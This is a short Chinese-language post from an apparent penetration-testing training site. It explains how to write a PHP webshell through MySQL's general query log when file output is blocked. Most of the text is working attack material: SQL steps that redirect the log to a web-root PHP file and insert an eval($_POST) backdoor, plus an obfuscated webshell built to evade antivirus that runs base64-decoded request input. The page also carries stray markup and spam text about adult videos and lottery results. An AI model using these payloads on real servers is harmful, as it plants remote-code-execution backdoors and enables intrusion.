<sub id="dfg0s"></sub><wbr id="dfg0s"></wbr>
<sub id="dfg0s"><listing id="dfg0s"></listing></sub>
<sub id="dfg0s"></sub>
<dd id="dfg0s"><address id="dfg0s"></address></dd>
  • <sub id="dfg0s"><table id="dfg0s"></table></sub>

    <nav id="dfg0s"></nav>

    SQL語句利用日志寫shell

    outfile被禁止,或者寫入文件被攔截

    在數據庫中操作如下:(必須是root權限)

    1.show variables like ‘%general%'; #查看配置

    2.set global general_log = on; #開啟general log模式

    3.set global general_log_file = ‘/var/www/html/1.php'; #設置日志目錄為shell地址

    4.select ‘<?php eval($_POST[cmd]);?>’ #寫入shell

    不成功的案例,如果mysql 被降權,是無法寫入到其他的站點目錄的,除非你的目標目錄是可以寫入的。

    SQL查詢免殺shell的語句

    SELECT “<?php $p = array(‘f’=>’a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$a = array_keys($p);$_=$p[‘pffff’].$p[‘pffff’].$a[2];$_= ‘a’.$_.’rt';$_(base64_decode($_REQUEST[‘username’]));?>”

    標簽: 日志 shell

    作者:墨客 來源:互聯網 瀏覽量:9697 時間: 2017-12-21

    加入墨者學院可立即獲得20墨幣

    可免費開啟靶場環境

    點擊注冊領取

    已有賬號,立即登錄

    你是不是好久没有被C了_少妇找技师做性按摩视频在线观看_午夜福利电影_777766香港开奖结果 7777